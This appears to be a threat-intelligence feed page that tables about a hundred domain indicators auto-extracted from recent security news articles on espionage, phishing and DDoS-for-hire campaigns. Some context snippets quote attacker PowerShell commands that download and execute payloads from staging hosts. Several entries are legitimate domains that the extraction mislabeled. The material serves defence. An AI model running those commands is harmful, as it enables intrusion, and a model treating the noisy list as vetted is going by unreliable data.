Indicators of compromise
1,014 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | handala-hack.to | ological operations and transnational repression, including Handala-Hack[.]to and Handala-Redwanted[.]to. The DOJ affidavit described “ | Handala Hack Uses CRUDEEXCLUDE to Disable Defender Protections and Deploy HEAVYGRAM GBHackers | · 39m ago |
| domain | handala-redwanted.to | d transnational repression, including Handala-Hack[.]to and Handala-Redwanted[.]to. The DOJ affidavit described “Heavygram” in incidents inv | Handala Hack Uses CRUDEEXCLUDE to Disable Defender Protections and Deploy HEAVYGRAM GBHackers | · 39m ago |
| domain | hoster-kg.com | NodeEdgeRAT and NomadRAT. A sibling domain associated with hoster-kg[.]com was listed by Bitdefender as NodeEdgeRAT infrastructure, | SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms GBHackers | · 1h ago |
| domain | hunt.io | ence data showing a SpiceRat detection on port 80 (Source : Hunt.io). Researchers found no credential collection forms, payload | SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms GBHackers | · 1h ago |
| domain | it.com | seller brands differ. A notable pivot involved ns2.asiainfo.it[.]com , which resolved to SpiceRAT servers in Estonia, Bulgaria | SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms GBHackers | · 1h ago |
| domain | skycom.support | and elsewhere during early 2026. Another hostname, manager.skycom[.]support , appeared in Bitdefender’s SilkParasite indicators and a | SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms GBHackers | · 1h ago |
| domain | tdtu.org | sted by Bitdefender as NodeEdgeRAT infrastructure, while kg.tdtu[.]org shared a parent-domain relationship with a NomadRAT C2 in | SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms GBHackers | · 1h ago |
| domain | uzrailwaystax.com | cant link. Multiple hosts presented a certificate for azure.uzrailwaystax[.]com , an attacker-controlled domain impersonating Uzbekistan’ | SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms GBHackers | · 1h ago |
| domain | 9527db6e1a.nxcli.io | he From line is where it falls apart. It comes from support@9527db6e1a[.]nxcli[.]io, which is not an OpenAI address. The link runs through | A fake ChatGPT billing email is after your OpenAI password Help Net Security | · 1h ago |
| domain | notifications.googleapis.com | s not link to the phishing site directly. Its URL starts at notifications[.]googleapis[.]com, a Google API redirect that forwards the browser to the | A fake ChatGPT billing email is after your OpenAI password Help Net Security | · 1h ago |
| domain | nxcli.io | icators: the Google redirect link and two paths on the same nxcli[.]io host, login.php and key.php. Mail teams can search their | A fake ChatGPT billing email is after your OpenAI password Help Net Security | · 1h ago |
| domain | api.mainnet.solana.com | campaign leverages the legitimate Solana blockchain via the api.mainnet.solana.com RPC endpoint to deliver the address of the second‑stage C2 | The Odyssey and trojans again: MovieReaper attacks users in multiple countries via compromised torrents Kaspersky Securelist | · 1h ago |
| domain | deadhub.org | memory and execute. While doing it, loader decodes https://deadhub[.]org domain name and if connection to it has failed, then it u | The Odyssey and trojans again: MovieReaper attacks users in multiple countries via compromised torrents Kaspersky Securelist | · 1h ago |
| domain | itorrents.org | promised a widely used public repository of torrent files — itorrents[.]org . As a result, torrent trackers that relied on this repos | The Odyssey and trojans again: MovieReaper attacks users in multiple countries via compromised torrents Kaspersky Securelist | · 1h ago |
| domain | ams1.vultrobjects.com | ntimeSSH_17[.]zip ZIP archive download location URL hxxps://ams1[.]vultrobjects[.]com/micbucket/Temp/0412.mp4 Decoy video download location U | Hackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware Cyber Security News | · 1h ago |
| domain | micbucket.ams1.vultrobjects.com | ket/Temp/0412.mp4 Decoy video download location URL hxxps://micbucket[.]ams1[.]vultrobjects[.]com/Exclude/Telegram.exe Malicious executable download lo | Hackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware Cyber Security News | · 1h ago |
| domain | ppt1.sgp1.vultrobjects.com | jgdb/efg_d4[.]zip ZIP archive download location URL hxxps://ppt1[.]sgp1[.]vultrobjects[.]com/myvideo.mp4 Decoy video download location URL hxxps:/ | Hackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware Cyber Security News | · 1h ago |
| domain | sgp1.vultrobjects.com | 2174f6e691d6845ac645b68f1f2538 First-stage file URL hxxps://sgp1[.]vultrobjects[.]com/jttrepijgdb/Artificial%20intelligence.pptx Decoy docume | Hackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware Cyber Security News | · 1h ago |
| domain | adm-devon.com | ated with Uzbek administration-themed spoofing Domain azure.adm-devon[.]com Uzbek administration-themed domain IP Address 5.183.95[.] | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | cwisuz.com | ]net Domain impersonating the Galkynysh gas field Domain kg.cwisuz[.]com Domain observed on the same host IP Address 45.153.127[.] | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | devon-uz.com | .]com NodeEdgeRAT-related sibling hostname Domain uzrailway.devon-uz[.]com BloodAlchemy-related railway-themed domain SHA-256 Hash 2 | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | dushanbeidc.org | sharing the LokiDev self-signed certificate Domain normativ.dushanbeidc[.]org Domain impersonating Tajikistan’s national IT hub project | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | galkynysh.net | ciated with Central Asian energy-themed domains Domain help.galkynysh[.]net Domain impersonating the Galkynysh gas field Domain kg.cw | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | hoster-kg.com | Host presenting the spoofed railway certificate Domain help.hoster-kg[.]com Domain linked to NodeEdgeRAT registration activity Domain | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | hpsupporter.com | Host with high-numbered remote desktop exposure Domain api.hpsupporter[.]com Support-themed infrastructure domain IP Address 46.30.191 | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | hunt.io | lowing operators to collect information and issue commands. Hunt.io analysts, working with researcher Guy Yasur, identified a c | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | infocomkg.org | st with high-numbered remote desktop exposure Domain center.infocomkg[.]org Kyrgyzstan communications-themed domain Domain kg.tdtu[.] | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | it.com | e RTX Corporation impersonation page hosted on ns2.asiainfo.it[.]com (Source – Hunt.io) The certificate was issued by TLC, a c | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | minings.blog | eRAT host serving the copied RTX page Domain infrastructure.minings[.]blog Domain observed on copied RTX page infrastructure IP Addr | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | mpekz.online | ssociated with Kazakh government-themed spoofing Domain gov.mpekz[.]online Kazakhstan government-themed domain IP Address 46.30.191[ | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | natcommunzu.com | st associated with Uzbek telecom-themed spoofing Domain tmk.natcommunzu[.]com Uzbekistan communications-themed domain IP Address 46.30. | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | oilgas-tm.com | associated with Turkmen energy-themed spoofing Domain sanly.oilgas-tm[.]com Turkmen energy-themed domain IP Address 45.86.162[.]141 H | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | panterstationary.online | 31.59.185[.]224 Host serving the copied RTX page Domain ns.panterstationary[.]online Domain observed on copied RTX page infrastructure Domain | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | plan-mail.com | 58.209[.]28 Host serving the copied RTX page Domain infoxxe.plan-mail[.]com Domain observed on copied RTX page infrastructure Domain | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | postmfa.com | Host with high-numbered remote desktop exposure Domain mail.postmfa[.]com Foreign affairs-themed mail domain IP Address 45.153.127[ | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | presldent.info | t associated with presidential-themed spoofing Domain state.presldent[.]info Presidential-themed typosquatting domain IP Address 46.30 | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | skycom.support | torical resolution for ns2.asiainfo.it[.]com Domain manager.skycom[.]support SpiceRAT-related hostname IP Address 194.68.225[.]168 His | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | sozandagon.org | associated with Tajikistan-themed spoofing Domain normativ.sozandagon[.]org Tajikistan-themed domain IP Address 192.121.87[.]172 Host | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | taustas.com | omain observed on copied RTX page infrastructure Domain pro.taustas[.]com Domain observed on copied RTX page infrastructure IP Addr | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | tdtu.org | mkg[.]org Kyrgyzstan communications-themed domain Domain kg.tdtu[.]org Domain sharing a parent domain with NomadRAT infrastructu | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | tmgaz-server.com | serving copied RTX page and spoofed certificate Domain www.tmgaz-server[.]com Domain impersonating Türkmengaz IP Address 46.30.188[.]54 | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | tojiktelecomtj.com | 46.30.188[.]54 Host serving the copied RTX page Domain www.tojiktelecomtj[.]com Domain impersonating Tojiktelecom IP Address 31.58.209[.] | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | uzrailwaystax.com | ss 2.58.14[.]95 Hunt.io-detected SpiceRAT host Domain azure.uzrailwaystax[.]com Spoofed Uzbek railway-themed domain IP Address 31.59.185[ | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | www.tm-mfa.com | s 185.243.114[.]124 Host serving the copied RTX page Domain www[.]tm-mfa[.]com Domain observed on copied RTX page infrastructure IP Ad | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | yntymak-ord.com | ciated with Kyrgyz presidential-themed spoofing Domain data.yntymak-ord[.]com Kyrgyz presidential residence-themed domain IP Address 19 | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | yntymak-ordo.com | ated with Kyrgyz presidential-themed spoofing Domain center.yntymak-ordo[.]com Kyrgyz presidential residence-themed domain IP Address 45 | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | ytnymak-ord.com | ciated with Kyrgyz presidential-themed spoofing Domain link.ytnymak-ord[.]com Kyrgyz presidential residence-themed domain IP Address 19 | SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia Cyber Security News | · 1h ago |
| domain | nightmare-stresser.com | attacks targeting online platforms and services. Before the nightmare-stresser[.]com and nightmarestresser[.]org were taken down , the stresse | US takes down NightmareStresser DDoS-for-hire platform BleepingComputer | · 2h ago |
| domain | nightmarestresser.com | 22, the U.S. Department of Justice (DOJ) also took down the nightmarestresser[.]com domain and arrested six suspects who allegedly owned mult | US takes down NightmareStresser DDoS-for-hire platform BleepingComputer | · 2h ago |
| domain | nightmarestresser.org | forms and services. Before the nightmare-stresser[.]com and nightmarestresser[.]org were taken down , the stresser service described itself a | US takes down NightmareStresser DDoS-for-hire platform BleepingComputer | · 2h ago |
| domain | biktpw.top | domains showing the pattern used by the campaign: t-mobile.biktpw[.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdik | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | cugbjl.top | attern used by the campaign: t-mobile.biktpw[.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzc | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | cymfjd.top | paign: t-mobile.biktpw[.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxe | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | gdikxv.top | [.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdc | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | hdzcnb.top | [.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrb | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | koxetp.top | [.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrh | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | nxdcfp.top | [.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qsci | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | pkrbai.top | [.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfn | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | qfrhkt.top | [.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnq | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | qscizj.top | [.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnqsu[.]top Stop threats | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | tmfncb.top | [.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnqsu[.]top Stop threats before they can do any | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | vmnqsu.top | [.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnqsu[.]top Stop threats before they can do any harm. Malwarebytes Br | T-Mobile rewards points expiry texts are a phishing scam Malwarebytes Labs | · 3h ago |
| domain | backblazeb2.com | ion Payload staging URL hxxps://clients-easy.s3.us-east-005.backblazeb2[.]com/Automata-20.zip RUSTYMOVE payload archive Payload staging | APT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks Cyber Security News | · 4h ago |
| domain | indiatodays.org | [.]org Domain used to stage payloads Payload staging domain indiatodays[.]org Domain used to stage payloads Payload staging URL theprin | APT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks Cyber Security News | · 4h ago |
| domain | officialinfo.org | [.]org Domain used to stage payloads Payload staging domain officialinfo[.]org Domain used to stage payloads Payload staging domain indi | APT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks Cyber Security News | · 4h ago |
| domain | theprints.org | cac18da31 Automata-20.exe, RUSTYMOVE Payload staging domain theprints[.]org Domain used to stage payloads Payload staging domain offi | APT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks Cyber Security News | · 4h ago |
| domain | indiatodays.org | outlets, including theprints[.]org , spoofing ThePrint, and indiatodays[.]org , spoofing India Today. These domains hosted intermediary | APT36 Targets Indian Government and Defense Organizations With New Rust Malware Arsenal GBHackers | · 4h ago |
| domain | officialinfo.org | yload staging domain theprints[.]org Payload staging domain officialinfo[.]org Payload staging domain indiatodays[.]org Payload staging | APT36 Targets Indian Government and Defense Organizations With New Rust Malware Arsenal GBHackers | · 4h ago |
| domain | theprints.org | domains impersonating major Indian news outlets, including theprints[.]org , spoofing ThePrint, and indiatodays[.]org , spoofing Ind | APT36 Targets Indian Government and Defense Organizations With New Rust Malware Arsenal GBHackers | · 4h ago |
| domain | tradingclaw.pro | : HP) The installer is genuine Microsoft software The site, tradingclaw[.]pro, gave its bot a name that echoes a well-known AI assistan | Fake AI trading agent steals crypto wallet passwords Help Net Security | · 6h ago |
| domain | github.com | v Tunnels endpoint pattern abused to expose RDP URL https://github[.]com/mirror-js/mirror-js/refs/heads/main/js/js-webpack.zip Arc | NightEagle Hackers Abuse Microsoft Dev Tunnels and GhostContainer to Breach Russian Companies Cyber Security News | · 6h ago |
| domain | backblazeb2.com | how up unexpectedly in DNS or proxy logs: api.telegram.org, backblazeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightnin | Chosen Brick, Iran’s Surveillance Malware Security Affairs | · 7h ago |
| domain | iproyal.com | gram.org, backblazeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightningproxies.net. None of these are malicious on t | Chosen Brick, Iran’s Surveillance Malware Security Affairs | · 7h ago |
| domain | lightningproxies.net | zeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightningproxies.net. None of these are malicious on their own, which is exactly | Chosen Brick, Iran’s Surveillance Malware Security Affairs | · 7h ago |
| domain | vultrobjects.com | ly in DNS or proxy logs: api.telegram.org, backblazeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightningproxies.net. None | Chosen Brick, Iran’s Surveillance Malware Security Affairs | · 7h ago |
| domain | asp.net | is a .NET-based implant designed to blend into Exchange and ASP.NET activity while providing command execution, proxying, socke | NightEagle Hackers Target Russian Companies Using GhostContainer Backdoor GBHackers | · 8h ago |
| domain | asp.net | is a .NET-based implant designed to blend into Exchange and ASP.NET activity while providing command execution, proxying, socke | NightEagle Hackers Abuse Microsoft Dev Tunnels and GhostContainer to Breach Russian Companies GBHackers | · 8h ago |
| domain | nightmare-stresser.com | ce known as NightmareStresser. The domains in question are: nightmare-stresser[.]com and nightmarestresser[.]org. Visitors to the site are now | U.S. Seizes NightmareStresser Domains Linked to Hundreds of Thousands of DDoS Attacks The Hacker News | · 9h ago |
| domain | nightmarestresser.com | December 2022, another domain linked to NightmareStresser ("nightmarestresser[.]com") was among the 48 domains that were seized by the DoJ. E | U.S. Seizes NightmareStresser Domains Linked to Hundreds of Thousands of DDoS Attacks The Hacker News | · 9h ago |
| domain | nightmarestresser.org | . The domains in question are: nightmare-stresser[.]com and nightmarestresser[.]org. Visitors to the site are now greeted by a seizure banner | U.S. Seizes NightmareStresser Domains Linked to Hundreds of Thousands of DDoS Attacks The Hacker News | · 9h ago |
| domain | adtarget.com | plain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an advertising domain registered in 1998. The lookalike | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | adtargett.com | ick marketing review. One delivery host hid in plain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an adverti | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | booking.com | ects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific target sites, so they stayed t | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | buking.com | ink rewriters, and redirects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific targe | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | cdnpps.us | Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside th | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | hanstrackr.com | net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside these disabled modules. On the shop, the act | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | jullyambery.net | domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older captures, what those endpoi | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | scrprime.com | to change its behavior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | sugabit.net | d turned off on this storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint h | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | votetoda.com | this storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | youronlinesearches.com | havior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older capture | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 18h ago |
| domain | asp.net | xtraction of cryptographic keys used by the server from the ASP.NET configuration, followed by overwriting the VIEWSTATE framew | Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers The Hacker News | · 22h ago |
| domain | ipapi.co | btain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database, and recovery m | Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers The Hacker News | · 22h ago |
| domain | ipify.org | ommand Prompt, obtain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database, | Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers The Hacker News | · 22h ago |
| domain | backblazeb2.com | s using the following command: powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip C2 commun | Operation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH Zscaler ThreatLabz | · 23h ago |
| domain | indiatodays.org | conhost.exe --headless powershell.exe -EncodedCommand [irm indiatodays[.]org/pv | iex] Create scheduled tasks that execute payloads at | Operation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH Zscaler ThreatLabz | · 23h ago |
| domain | bjssourcing.com | rs of Compromise (IoCs):- Type Indicator Description Domain bjssourcing[.]com Lookalike sender domain used in the procurement-officer p | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 23h ago |
| domain | elitechiropracticandrehab.com | crypted redirect destination Domain account-access-rc3uenqi.elitechiropracticandrehab[.]com Device-code phishing server hosted under a likely comprom | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 23h ago |
| domain | flipbookonlinevault.com | ent used as the document-sharing lure URL hxxps://chartered.flipbookonlinevault[.]com/scanna/200e61bfe54c92fb720c77c3a1661bc0/b5ea87c2ddac3aa14 | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 23h ago |
| domain | greenlightdlstribution.com | ender domain used in the procurement-officer pretext Domain greenlightdlstribution[.]com Related impersonation domain registered during the campai | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 23h ago |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.